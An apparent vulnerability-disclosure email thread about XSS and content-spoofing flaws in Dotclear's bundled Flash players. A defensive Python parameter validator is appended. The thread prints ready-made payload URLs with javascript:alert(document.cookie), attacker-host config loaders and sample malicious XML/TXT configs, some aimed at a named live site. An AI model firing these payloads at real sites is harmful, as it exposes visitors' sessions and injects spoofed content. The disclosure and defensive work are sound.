Here is the answer to my question from this morning. I'll leave it to you to
deal with it; I'm completely lost when it comes to security (I haven't yet
really understood the ins and outs of these flaws or how dangerous they
could be).


---------- Forwarded message ----------
From: MustLive <[email protected]>
Date: 2013/4/12
Subject: Re: XSS and CS vulnerabilities in Dotclear
To: "Dotclear (contact)" <[email protected]>


*Hi guys!*

You are welcome!

I was already trying to help you on the 14th of January :-). But it looks like
you haven't received my letter (I always deal with not serious people who don't
receive my letters due to their lame antispam filters, but it's their own
problem and everyone must do everything to receive letters from other
people, make sure that antispam filters work correctly - remove spam, but
keep normal letters, and especially allow security-related letters). It is
strange that you haven't received my letter from the 14th of June, but
received the letter from the 9th of April. Exactly because I've not received an
answer to my letter from 10.04, I sent a new letter yesterday from another of my
e-mails (from gmail), which I have been using for many years specially for such
cases, when I see people not receiving my letters (with no responses, or
there are "returns" showing that filters don't allow letters from my e-mail, to
bypass such lame filters). This letter I'm sending from my gmail account
for sure.

Because I was planning to disclose this letter this week, since almost
three months have passed since informing you in January, I reminded
you three days ago. First I planned to disclose it on Tuesday evening, but
because it turned out that you have fixed (and badly) only the holes in
SWFUpload, I postponed it to Wednesday, then to Thursday and now to
Friday evening. But I'm planning to do it at last this evening (and will
write to the security lists tomorrow), so you need to fix these holes in the
swf files today already ;-).

After I saw that you had fixed only the holes in SWFUpload and mentioned only
that, I began thinking that you hadn't received my letter in January,
and that you became aware of the SWFUpload holes related to Dotclear from my
advisories in November and March. But in that letter I wrote about many
more holes in your engine (in all three swf-files).

I'm resending my January letter below. Note that in that letter I did not
write many details of the holes in player_mp3.swf, to keep the letter more
laconic. Anyway the holes are similar to player_flv.swf - all CS holes are
similar for both these flash applications and there are no XSS holes in the mp3
player. Here are the details for player_mp3.swf, so it'll be more obvious for
you (the xml and txt config files are similar for both these flashes).

*Content Spoofing (WASC-12):*

http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml

http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt

http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3

Certainly give me any URL of a web site on Dotclear 2.5, so I can check your
protection against attacks on swf-files. Note that the protection you
referenced (that you made in version 2.5) is only for Apache
and not for other web servers. As I checked yesterday, you have used
.htaccess to block access to files (including swf files). But .htaccess
works only in Apache; on nginx and other web servers your engine will
not be protected, and all XSS and CS holes in these three flashes can be
used for attacks.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----
*From:* MustLive <[email protected]>
*To:* [email protected]
*Sent:* Monday, January 14, 2013 12:57 AM
*Subject:* XSS and Content Spoofing vulnerabilities in Dotclear

*Hello developers of Dotclear!*

I want to warn you about Cross-Site Scripting and Content Spoofing
vulnerabilities in Dotclear. After I wrote about the Magazeen theme for
WordPress and Dotclear (which was using vulnerable TimThumb), here are
new vulnerabilities related to Dotclear.

I mentioned these vulnerabilities in the Magazeen theme at my site (
http://websecurity.com.ua/5120/) in 2011. You can read in English about
vulnerabilities in TimThumb and in multiple themes for different engines (
http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080258.html)
and about vulnerabilities in the Magazeen theme (
http://lists.grok.org.uk/pipermail/full-disclosure/2011-May/080659.html).

These were Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13),
Abuse of Functionality (WASC-42) and Denial of Service (WASC-10)
vulnerabilities in TimThumb, and later also an Arbitrary File Uploading
(WASC-31) vulnerability. And now I'm informing you about Cross-Site
Scripting and Content Spoofing in the core of your CMS.

Your engine has three swf files (according to your site
http://dev.dotclear.org/2.0/browser/inc/swf); I suppose the last version,
Dotclear 2.4.4, too. And these files are vulnerable to XSS and CS, so your
engine has these holes.

File swfupload.swf is SWFUpload and it has an XSS vulnerability. I wrote
about swfupload.swf in different engines, including Dotclear, at my site
(http://websecurity.com.ua/6144/) in 2012.

*Cross-Site Scripting (WASC-08):*

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

File player_flv.swf is FLV Player and it has a lot of
vulnerabilities. I wrote about the vulnerabilities in FLV Player in an
advisory at my site (http://websecurity.com.ua/5098/) in 2011. In English (
http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082321.html).

*Cross-Site Scripting (WASC-08):*

http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)

*Content Spoofing (WASC-12):*

http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml

Here are all the holes in FLV Player.

*Content Spoofing (WASC-12):*

http://site/player_flv_classic.swf?configxml=http://site/1.xml

http://site/player_flv_maxi.swf?configxml=http://site/1.xml

http://site/player_flv_classic.swf?config=http://site/1.txt

http://site/player_flv_maxi.swf?config=http://site/1.txt

http://site/player_flv_classic.swf?flv=http://site/film.flv&startimage=http://site/start_frame.jpg

http://site/player_flv_maxi.swf?flv=http://site/film.flv&startimage=http://site/start_frame.jpg

http://site/player_flv_mini.swf?flv=http://site/film.flv

*XSS (WASC-08):*

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?configxml=http://site/xss.xml

File xss.xml

<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>

http://site/player_flv_maxi.swf?config=http://site/xss.txt

File xss.txt

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

The code will execute after a click (or double click). It's strictly
social XSS.

File player_flv.swf is some mp3 player, but it has similar holes to FLV
Player (if not all, then many of the above-mentioned holes).

*Content Spoofing (WASC-12):*

http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml

Vulnerable are all versions of Dotclear - Dotclear 2.4.4 and previous
versions.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----
*From:* Dotclear (contact) <[email protected]>
*To:* MustLive <[email protected]>
*Sent:* Friday, April 12, 2013 8:22 AM
*Subject:* Re: XSS and CS vulnerabilities in Dotclear

Hi,

Of course we will not leave any vulnerabilities in our script, as far as
possible, and we would like to know exactly what the other holes you
talked about (in the two other swf-files) are. Could you explain to us what they are?

We have also looked carefully in our two different mail archives and cannot
find any mail from you on 14 January 2013. We heard about these
problems in swfupload another way. If it had been the case we would, as usual,
have thanked you one way or another, be sure about this.

Thanks a lot for helping us.

Franck for DC Team



2013/4/11 MustLive <[email protected]>

> *Hi Franck!*
>
> So what about those things which I wrote to you about yesterday?
>
> Are you planning to fix the other holes (in the two other swf-files), are you
> planning to fix the flash-file of SWFUpload or will you just use your "non-direct
> access to swf-files" approach (to prevent abuse of vulnerable swf-files
> instead of fixing them), and will you give me any URL of a web site on
> Dotclear 2.5, so I can check it?
>
> Best wishes & regards,
> Eugene Dokukin aka MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ----- Original Message -----
> *From:* MustLive <[email protected]>
> *To:* Dotclear (contact) <[email protected]>
> *Sent:* Wednesday, April 10, 2013 9:47 PM
> *Subject:* Re: XSS and CS vulnerabilities in Dotclear
>
> *Hello Franck!*
>
> Since there was no answer from you to my letter from 14.01.2013, I
> decided that you had ignored my letter. Because most of those who don't
> answer my letters just ignore them and don't fix the holes. And others (who
> don't answer my letters) fix them hiddenly without thanking and without
> officially mentioning (at the site and/or in the changelog) the fixing of the
> vulnerabilities and those who informed them about them. I haven't received any
> thanks and/or official mentions of me since the 14th of January.
>
> Plus I informed you about multiple vulnerabilities in three flashes,
> not just in one swf-file (the uploader) which you are referring to (without
> calling it by name - SWFUpload; it's clear to me, but not to others,
> nor does it count as an official reference to me and to the list of fixed
> holes, i.e. you should clearly write about fixing three holes: 2 Cross-Site
> Scripting and 1 Content Spoofing vulnerabilities, not mentioning the holes in
> the two other flash-files). From this it's clear that you have not fixed the holes in
> player_flv.swf and player_mp3.swf, and just fixed (and badly, see below) the holes
> in swfupload.swf.
>
> You said you had fixed the holes in SWFUpload, but it's not so. Before sending
> my previous letter to you, I checked your site, because almost 3 months had
> passed since informing you and I planned to disclose these holes soon. And
> at your site (http://dev.dotclear.org/2.0/browser/inc/swf) I found
> that no changes were made to player_flv.swf and player_mp3.swf and only
> swfupload.swf was changed (on 13.03.2013) to fix the holes in it. So you
> ignored the holes in the first two flashes and just fixed (without answering and
> thanking me) the holes in the third swf-file. I downloaded it and checked it
> on localhost and found that it's vulnerable to all the holes which I
> informed you about. So you didn't fix these holes either. And after that
> I wrote you my last letter.
>
> In which version (2.5) and how did you fix these holes, since all three
> swf-files are vulnerable? Did you prevent the flashes from being called
> directly, as you wrote? Then give me an example of any site on Dotclear 2.5,
> so I can check it. I have seen only sites with older versions of Dotclear, which
> are vulnerable to all these attacks on the flashes.
>
> > Note also that any of the injections given in example cannot be used
> > with Dotclear as our swf files cannot be called directly.
>
> Why do you think that your swf files cannot be called directly? At those web
> sites which I found on the Internet, I see that they can be called
> directly. So I have not seen such protection and for this reason considered
> all the vulnerabilities in swf files in Dotclear as real and informed you.
>
> Here are examples at one web site on your engine:
>
> *Cross-Site Scripting (WASC-08):*
>
>
> http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
>
> *Content Spoofing (WASC-12):*
>
> http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
>
> *Cross-Site Scripting (WASC-08):*
>
> http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
>
> And similar attacks on the other flash-files, about which I informed you -
> the XSS and CS vulnerabilities in player_flv.swf and player_mp3.swf.
>
> Best wishes &amp; regards,
> Eugene Dokukin aka MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
_______________________________________________
Dev mailing list - [email protected] - http://ml.dotclear.org/listinfo/dev
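The thread above shows two root causes: the players load their configuration and media from whatever URL is passed in `configxml`, `config`, `flv`, `mp3` or `startimage` (Content Spoofing), and they accept `javascript:` values for `onclick`/`ondoubleclick`, whether passed in the query string or delivered through the xss.xml / xss.txt config files (XSS). Blocking direct access to the .swf files, as the .htaccess workaround does, only hides the problem on Apache. The following is an added example, not Dotclear's code and not the players' ActionScript: a Python allowlist check modelling the input validation the players (or the page embedding them) should apply, and applied to the two config-file formats shown in the advisory. The site origin and all sample inputs are constructed, and treating the `onclick`/`ondoubleclick` values as link targets is an assumption.

```python
"""
Allowlist check for the Flash-player parameters abused in the advisory
(added example, not Dotclear's or the players' code).

Rules modelled here:
  * configxml / config / flv / mp3 / startimage must resolve to the site's
    own origin, so a player can never be pointed at http://attacker/1.xml;
  * onclick / ondoubleclick are assumed to be opened as link targets and must
    be same-origin http(s) URLs, so javascript:alert(document.cookie) fails.
SITE_ORIGIN and the sample inputs below are constructed.
"""
import xml.etree.ElementTree as ET
from urllib.parse import parse_qsl, urljoin, urlsplit

SITE_ORIGIN = "https://blog.example"          # constructed site origin

URL_PARAMS = {"configxml", "config", "flv", "mp3", "startimage"}
HANDLER_PARAMS = {"onclick", "ondoubleclick"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def _origin(url):
    """(scheme, host, port) of url, or None if the port is malformed."""
    parts = urlsplit(url)
    try:
        port = parts.port
    except ValueError:
        return None
    return (parts.scheme, parts.hostname, port or DEFAULT_PORTS.get(parts.scheme))


def same_origin(value, site_origin=SITE_ORIGIN):
    """True if value, resolved against site_origin, stays on that origin.

    Relative paths ('media/film.flv') pass; absolute URLs on another host,
    scheme-relative URLs ('//attacker/1.xml') and userinfo tricks
    ('https://blog.example@attacker/') all resolve elsewhere and fail.
    """
    resolved = urljoin(site_origin + "/", value.strip())
    origin = _origin(resolved)
    return origin is not None and origin == _origin(site_origin)


def safe_handler(value, site_origin=SITE_ORIGIN):
    """A click handler may only be a same-origin http(s) link.

    javascript:, data:, vbscript: and any other pseudo-scheme survive
    urljoin unchanged and are rejected before the origin comparison.
    """
    scheme = urlsplit(urljoin(site_origin + "/", value.strip())).scheme
    return scheme in ("http", "https") and same_origin(value, site_origin)


def _judge(pairs, site_origin):
    """Map each recognised parameter name to 'ok' or 'rejected'."""
    verdict = {}
    for name, value in pairs:
        if name in URL_PARAMS:
            verdict[name] = "ok" if same_origin(value, site_origin) else "rejected"
        elif name in HANDLER_PARAMS:
            verdict[name] = "ok" if safe_handler(value, site_origin) else "rejected"
        # unknown names are ignored here; a strict player would reject them
    return verdict


def validate_player_query(query, site_origin=SITE_ORIGIN):
    """Check the query string of a player URL (the part after '?')."""
    return _judge(parse_qsl(query, keep_blank_values=True), site_origin)


def check_config_text(text, site_origin=SITE_ORIGIN):
    """Check a key=value .txt config such as the advisory's xss.txt."""
    pairs = [line.split("=", 1) for line in text.splitlines() if "=" in line]
    return _judge(pairs, site_origin)


def check_config_xml(text, site_origin=SITE_ORIGIN):
    """Check a <config><param name=.. value=..> XML such as xss.xml.

    ElementTree does not fetch external entities, but an untrusted config
    should still be size-limited before it is parsed.
    """
    root = ET.fromstring(text.encode("utf-8"))
    pairs = [(p.get("name", ""), p.get("value", "")) for p in root.iter("param")]
    return _judge(pairs, site_origin)


# Constructed samples mirroring the advisory's xss.xml and xss.txt.
XSS_XML_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>"""
XSS_TXT_SAMPLE = ("onclick=javascript:alert(document.cookie)\n"
                  "ondoubleclick=javascript:alert(document.cookie)\n")

if __name__ == "__main__":
    for q in ("configxml=http://attacker/1.xml",
              "flv=media/film.flv&startimage=https://blog.example/start_frame.jpg",
              "onclick=javascript:alert(document.cookie)"):
        print(q, "->", validate_player_query(q))
    print("xss.xml ->", check_config_xml(XSS_XML_SAMPLE))
    print("xss.txt ->", check_config_text(XSS_TXT_SAMPLE))
```

The origin comparison is done on the resolved URL rather than on the raw string, so prefix tricks such as `https://blog.example.attacker/`, `//attacker/` or `https://blog.example@attacker/` are all rejected, while ordinary relative paths keep working. This is the per-parameter fix the advisory is asking for; a web-server rule that denies direct requests to the .swf files is a separate layer and must be written for each server in use (the thread notes that Dotclear's .htaccess rule has no effect on nginx).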
